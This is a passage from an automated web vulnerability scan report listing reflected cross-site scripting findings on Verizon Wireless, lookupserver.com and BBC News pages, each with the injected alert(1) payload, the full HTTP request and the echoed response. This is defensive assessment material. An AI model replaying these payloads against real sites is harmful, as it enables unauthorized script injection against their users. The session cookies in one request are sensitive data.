The value of the quantity request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9f547%3balert(1)//4aa1c76251f was submitted in the quantity parameter. This input was echoed as 9f547;alert(1)//4aa1c76251f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b2c/shoppingAssistant?step=custType&item=phoneFirst&phoneID=5632&quantity=19f547%3balert(1)//4aa1c76251f&hasMultipleAssociatedSimTOs=false&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceCategoryId=15
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312204729|session#1310993870949-319721#1310996989|check#true#1310995189; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmc=96859928; chkcookie=1310993892258; ZIPCODE=10010; CITY=New York; STATE=NY; devicePageView=list

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:44:02 GMT
Pragma: no-cache
Content-Length: 8019
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>
   <title>Shopping Cart</title>
   

                   
...[SNIP]...
<script type="text/javascript">
   function continueshopping() {

   
           phoneFirst.addPhone('phoneFirst',5632,19f547;alert(1)//4aa1c76251f ,false, function(data) {
       if(data.result){

           if(data.nextStep == 'serverError'){
               $('setError').set('html',data.errorMessage);
                   overlay.passFrameSize();
               document
...[SNIP]...

3.184. http://lookupserver.com/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://lookupserver.com
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 561e0<script>alert(1)</script>e04c3e53364 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: lookupserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)561e0<script>alert(1)</script>e04c3e53364
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:16:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Content-Length: 5703
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title
...[SNIP]...
<b>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)561e0<script>alert(1)</script>e04c3e53364</b>
...[SNIP]...

3.185. http://news.bbc.co.uk/2/hi/programmes/from_our_own_correspondent/9538059.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/programmes/from_our_own_correspondent/9538059.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7975'-alert(1)-'27a0b2dd17b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/hi/programmes/from_our_own_correspondent/9538059.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d7975'-alert(1)-'27a0b2dd17b

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:58 GMT
Keep-Alive: timeout=5, max=798
Expires: Mon, 18 Jul 2011 02:19:58 GMT
Connection: close
Content-Length: 66316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955598000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=d7975'-alert(1)-'27a0b2dd17b',
       section: null,
       sectionPath: '/programmes/from_our_own_correspondent',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '9538059',
       assetType: null,
       uri: '/2/hi/
...[SNIP]...

3.186. http://news.bbc.co.uk/go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 226c8'-alert(1)-'2bd0c895a29 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=226c8'-alert(1)-'2bd0c895a29

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:58 GMT
Keep-Alive: timeout=5, max=785
Expires: Mon, 18 Jul 2011 02:20:58 GMT
Connection: close
Content-Length: 66320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955658000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=226c8'-alert(1)-'2bd0c895a29',
       section: null,
       sectionPath: '/programmes/from_our_own_correspondent',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '9538059',
       assetType: null,
       uri: '/2/hi/
...[SNIP]...

3.187. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cycling/14179023.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/cycling/14179023.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dca67'-alert(1)-'0cda5dc6319 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/cycling/14179023.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=dca67'-alert(1)-'0cda5dc6319

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:39 GMT
Keep-Alive: timeout=5, max=751
Expires: Mon, 18 Jul 2011 02:20:39 GMT
Connection: close
Content-Length: 57306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955639000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=dca67'-alert(1)-'0cda5dc6319',
       section: 'cycling',
       sectionPath: '/cycling',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14179023',
       assetType: 'story',
       uri: '/sport2/hi/cycli
...[SNIP]...

3.188. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/14168601.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/football/14168601.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49552'-alert(1)-'09ddbd65199 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/football/14168601.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=49552'-alert(1)-'09ddbd65199

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:42 GMT
Keep-Alive: timeout=5, max=775
Expires: Mon, 18 Jul 2011 02:20:42 GMT
Connection: close
Content-Length: 52099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955642000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=49552'-alert(1)-'09ddbd65199',
       section: 'women',
       sectionPath: '/football',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14168601',
       assetType: 'story',
       uri: '/sport2/hi/footba
...[SNIP]...

3.189. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/golf/14178214.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/golf/14178214.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ff3c'-alert(1)-'3ebf363b53f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/golf/14178214.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2ff3c'-alert(1)-'3ebf363b53f

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:36 GMT
Keep-Alive: timeout=5, max=753
Expires: Mon, 18 Jul 2011 02:20:36 GMT
Connection: close
Content-Length: 56473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955636000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=2ff3c'-alert(1)-'3ebf363b53f',
       section: 'golf',
       sectionPath: '/golf',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14178214',
       assetType: 'story',
       uri: '/sport2/hi/golf/141782
...[SNIP]...

3.190. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/motogp/14177052.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/motogp/14177052.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8569a'-alert(1)-'1ba42694830 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/motogp/14177052.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8569a'-alert(1)-'1ba42694830

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:43 GMT
Keep-Alive: timeout=5, max=794
Expires: Mon, 18 Jul 2011 02:20:43 GMT
Connection: close
Content-Length: 53432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955643000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=8569a'-alert(1)-'1ba42694830',
       section: 'motorbikes',
       sectionPath: '/motogp',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14177052',
       assetType: 'story',
       uri: '/sport2/hi/mot
...[SNIP]...

3.191. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe938'-alert(1)-'03d0b63c54f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fe938'-alert(1)-'03d0b63c54f

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:40 GMT
Keep-Alive: timeout=5, max=776
Expires: Mon, 18 Jul 2011 02:20:40 GMT
Connection: close
Content-Length: 49436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955640000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=fe938'-alert(1)-'03d0b63c54f',
       section: 'welsh',
       sectionPath: '/rugby_union/welsh',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14175299',
       assetType: 'story',
       uri: '/sport2/
...[SNIP]...

3.192. http://news.bbc.co.uk/sport2/hi/cycling/14179023.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/cycling/14179023.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a28c'-alert(1)-'1816b6df525 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/cycling/14179023.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=3a28c'-alert(1)-'1816b6df525

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:21:06 GMT
Keep-Alive: timeout=5, max=797
Expires: Mon, 18 Jul 2011 02:21:06 GMT
Connection: close
Content-Length: 57306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955666000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=3a28c'-alert(1)-'1816b6df525',
       section: 'cycling',
       sectionPath: '/cycling',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14179023',
       assetType: 'story',
       uri: '/sport2/hi/cycli
...[SNIP]...

3.193. http://news.bbc.co.uk/sport2/hi/football/14168601.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/football/14168601.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa85e'-alert(1)-'33ab69fc437 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/football/14168601.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fa85e'-alert(1)-'33ab69fc437

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:36 GMT
Keep-Alive: timeout=5, max=773
Expires: Mon, 18 Jul 2011 02:20:36 GMT
Connection: close
Content-Length: 52023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955636000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=fa85e'-alert(1)-'33ab69fc437',
       section: 'women',
       sectionPath: '/football',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14168601',
       assetType: 'story',
       uri: '/sport2/hi/footba
...[SNIP]...

3.194. http://news.bbc.co.uk/sport2/hi/golf/14178214.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/golf/14178214.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a432b'-alert(1)-'9bd28bad69c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/golf/14178214.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a432b'-alert(1)-'9bd28bad69c

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:44 GMT
Keep-Alive: timeout=5, max=711
Expires: Mon, 18 Jul 2011 02:20:44 GMT
Connection: close
Content-Length: 55850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955644000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=a432b'-alert(1)-'9bd28bad69c',
       section: 'golf',
       sectionPath: '/golf',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14178214',
       assetType: 'story',
       uri: '/sport2/hi/golf/141782
...[SNIP]...

3.195. http://news.bbc.co.uk/sport2/hi/motogp/14177052.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/motogp/14177052.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4d7e'-alert(1)-'ec64a95f7e7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/motogp/14177052.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d4d7e'-alert(1)-'ec64a95f7e7

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:45 GMT
Keep-Alive: timeout=5, max=794
Expires: Mon, 18 Jul 2011 02:20:45 GMT
Connection: close
Content-Length: 53432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955645000,
       editionToServe: 'international',
       queryString: null,
